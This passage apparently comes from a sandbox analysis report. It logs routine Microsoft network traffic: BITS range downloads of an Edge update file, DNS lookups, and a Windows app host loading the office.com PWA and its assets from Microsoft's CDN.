                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=157425908-160839635
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:33 GMT
                Content-Type: application/octet-stream
                Content-Length: 3413728
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9b7716-2915334016-116
                Ocn-Served-By: QLT
                Content-Range: bytes 157425908-160839635/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=160839636-165421121
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:34 GMT
                Content-Type: application/octet-stream
                Content-Length: 4581486
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9b9329-2915334016-117
                Ocn-Served-By: QLT
                Content-Range: bytes 160839636-165421121/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=165421122-174155211
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:35 GMT
                Content-Type: application/octet-stream
                Content-Length: 8734090
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9bb087-2915334016-118
                Ocn-Served-By: QLT
                Content-Range: bytes 165421122-174155211/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=174155212-177180215
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:37 GMT
                Content-Type: application/octet-stream
                Content-Length: 3025004
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9bd47c-2915334016-119
                Ocn-Served-By: QLT
                Content-Range: bytes 174155212-177180215/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-us
                DNS
                www.office.com
                wwahost.exe
                Remote address:
                8.8.8.8:53
                Request
                www.office.com
                IN A
                Response
                www.office.com
                IN CNAME
                home-portal.office.com
                home-portal.office.com
                IN CNAME
                home-office365-com.b-0004.b-msedge.net
                home-office365-com.b-0004.b-msedge.net
                IN CNAME
                b-0004.b-msedge.net
                b-0004.b-msedge.net
                IN A
                13.107.6.156
              • flag-us
                GET
                https://www.office.com/pwa
                wwahost.exe
                Remote address:
                13.107.6.156:443
                Request
                GET /pwa HTTP/2.0
                host: www.office.com
                accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                accept-language: en-US
                upgrade-insecure-requests: 1
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                accept-encoding: gzip, deflate, br
                Response
                HTTP/2.0 200
                content-type: text/html; charset=utf-8
                content-encoding: gzip
                vary: Accept-Encoding
                set-cookie: OHPWA.SID=dbf815f5-b5e9-4f15-95da-9bb960427a60; path=/; secure; samesite=none
                set-cookie: OH.FLID=ec776b5f-8330-4605-97b7-35a72099fd87; expires=Wed, 11 Feb 2026 16:57:42 GMT; path=/; secure; samesite=none; httponly
                set-cookie: OH.DCAffinity=OH-weu; expires=Wed, 12 Feb 2025 00:57:42 GMT; path=/; secure; samesite=none; httponly
                request-context: appId=
                strict-transport-security: max-age=31536000; includeSubDomains
                referrer-policy: strict-origin-when-cross-origin
                x-content-type-options: nosniff
                x-xss-protection: 1; mode=block
                x-frame-options: SAMEORIGIN
                x-ua-compatible: IE=edge,chrome=1
                x-cache: CONFIG_NOCACHE
                x-msedge-ref: Ref A: 3355A26CA84D4118BDB3778AA4D8ADD6 Ref B: AMS231032601005 Ref C: 2025-02-11T16:57:42Z
                date: Tue, 11 Feb 2025 16:57:42 GMT
              • flag-us
                DNS
                res.cdn.office.net
                wwahost.exe
                Remote address:
                8.8.8.8:53
                Request
                res.cdn.office.net
                IN A
                Response
                res.cdn.office.net
                IN CNAME
                res-prod.trafficmanager.net
                res-prod.trafficmanager.net
                IN CNAME
                res-1.cdn.office.net
                res-1.cdn.office.net
                IN CNAME
                res-prod.cdn.office.net.akadns.net
                res-prod.cdn.office.net.akadns.net
                IN CNAME
                res-stls-prod.edgesuite.net
                res-stls-prod.edgesuite.net
                IN CNAME
                res-stls-prod.edgesuite.net.globalredir.akadns88.net
                res-stls-prod.edgesuite.net.globalredir.akadns88.net
                IN CNAME
                a726.dscd.akamai.net
                a726.dscd.akamai.net
                IN A
                2.20.12.97
                a726.dscd.akamai.net
                IN A
                2.20.12.98
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png HTTP/2.0
                host: res.cdn.office.net
                referer: https://www.office.com/pwa
                accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-length: 20276
                content-type: image/png
                last-modified: Fri, 13 Jan 2023 00:26:14 GMT
                x-ms-request-id: ae7b3b64-e01e-0004-3e9a-727290000000
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                alt-svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                akamai-request-bc: [a=2.19.253.155,b=1139733334,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef356&TotalRTCDNTime=45&CompressionType=&FileSize=20276"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/images/content/images/lockup-mslogo-color-78c06e8898.png HTTP/2.0
                host: res.cdn.office.net
                referer: https://www.office.com/pwa
                accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-length: 27126
                content-type: text/css
                last-modified: Wed, 05 Feb 2025 23:16:03 GMT
                x-ms-request-id: a07ca714-e01e-0014-5a83-78b7f8000000
                content-encoding: br
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                akamai-request-bc: [a=2.19.253.155,b=1139733338,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef35a&TotalRTCDNTime=45&CompressionType=br&FileSize=27126"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/bundles/pwa-21c1529f14.css
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/bundles/pwa-21c1529f14.css HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: text/css,*/*;q=0.1
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-length: 258389
                last-modified: Fri, 07 Feb 2025 01:48:00 GMT
                x-ms-request-id: 2c281ad7-701e-0039-09eb-79048b000000
                content-encoding: br
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                akamai-request-bc: [a=2.19.253.155,b=1139733339,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef35b&TotalRTCDNTime=45&CompressionType=br&FileSize=258389"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                content-type: application/javascript
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/officestartbundles/main.67e42fd23a2b7a46f0bc.css
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/officestartbundles/main.67e42fd23a2b7a46f0bc.css HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: text/css,*/*;q=0.1
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-type: text/plain
                last-modified: Wed, 01 Sep 2021 01:25:48 GMT
                x-ms-request-id: c5befc71-701e-004b-60e8-6f03c4000000
                content-encoding: gzip
                content-length: 4557
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139733336,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef358&TotalRTCDNTime=45&CompressionType=gzip&FileSize=4557"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/officestartbundles/main.9460bc0ade9d5e4e6ec4.js
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/officestartbundles/main.9460bc0ade9d5e4e6ec4.js HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: */*
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-type: text/css
                last-modified: Sat, 11 Jan 2025 18:39:10 GMT
                x-ms-request-id: e4f41818-b01e-006b-157a-667863000000
                content-encoding: gzip
                content-length: 1256
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139733337,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef359&TotalRTCDNTime=45&CompressionType=gzip&FileSize=1256"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/officestartbundles/vendors.e20a05dacbab616aa4ce.js
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/officestartbundles/vendors.e20a05dacbab616aa4ce.js HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: */*
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-length: 403195
                last-modified: Thu, 06 Feb 2025 20:14:12 GMT
                x-ms-request-id: 92cb6121-e01e-0049-564e-79bd7c000000
                content-encoding: br
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                akamai-request-bc: [a=2.19.253.155,b=1139733341,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef35d&TotalRTCDNTime=45&CompressionType=br&FileSize=403195"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                content-type: application/javascript
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/bundles/sharedscripts-939520eada.js HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: */*
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                last-modified: Thu, 29 Jun 2023 22:42:44 GMT
                x-ms-request-id: 21dfbb22-401e-0032-6c8b-60ffe0000000
                content-encoding: gzip
                content-length: 15218
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139733473,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef3e1&TotalRTCDNTime=45&CompressionType=gzip&FileSize=15218"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                content-type: application/javascript
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/images/content/images/pwa-unauth-hero-image-aa1ee34a38.png
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/images/content/images/pwa-unauth-hero-image-aa1ee34a38.png HTTP/2.0
                host: res.cdn.office.net
                referer: https://www.office.com/pwa
                accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-length: 5496395
                content-type: image/png
                last-modified: Thu, 29 Aug 2024 15:03:49 GMT
                x-ms-request-id: 759cd669-001e-0041-0b9a-72a773000000
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                akamai-request-bc: [a=2.19.253.155,b=1139733522,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef412&TotalRTCDNTime=45&CompressionType=&FileSize=5496395"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/bundles/otel-logger-a79fa4a4c2580f67e6a9.js
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/bundles/otel-logger-a79fa4a4c2580f67e6a9.js HTTP/2.0
                host: res.cdn.office.net
                origin: https://www.office.com
                referer: https://www.office.com/pwa
                accept: */*
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                last-modified: Mon, 03 Feb 2025 14:54:13 GMT
                x-ms-request-id: c0bfef56-c01e-0013-5654-76db9b000000
                content-encoding: gzip
                content-length: 33356
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139733523,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef413&TotalRTCDNTime=45&CompressionType=gzip&FileSize=33356"}],"include_subdomains ":true}
                nel: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                server-timing: clientrtt; dur=45, clienttt; dur=, origin; dur=0 , cdntime; dur=0
                akamai-cache-status: Hit from child
                x-content-type-options: nosniff
                timing-allow-origin: *
                access-control-expose-headers: date,Akamai-Request-BC,X-Cdn-Provider,X-Ms-Request-Id
                access-control-allow-origin: *
                strict-transport-security: max-age=31536000; includeSubDomains
                content-type: application/javascript
                x-cdn-provider: Akamai
              • flag-gb
                GET
                https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                wwahost.exe
                Remote address:
                2.20.12.97:443
                Request
                GET /officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png HTTP/2.0
                host: res.cdn.office.net
                referer: https://www.office.com/pwa
                accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                accept-language: en-US
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; MSAppHost/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                content-type: text/plain
                last-modified: Wed, 01 Sep 2021 01:22:02 GMT
                x-ms-request-id: bbbb3dcc-401e-000d-47d9-703743000000
                content-encoding: gzip
                content-length: 308
                cache-control: max-age=630720000
                date: Tue, 11 Feb 2025 16:57:43 GMT
                vary: Accept-Encoding
                akamai-request-bc: [a=2.19.253.155,b=1139734252,c=g,n=GB_EN_SLOUGH,o=20940]
                ak-network: FF
                report-to: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=SLOUGH&ASN=20940&Country=GB&Region=EN&RequestIdentifier=0.9bfd1302.1739293063.43eef6ec&TotalRTCDNTime=42&CompressionType=gzip&FileSize=308"}],"include_subdomains ":true}
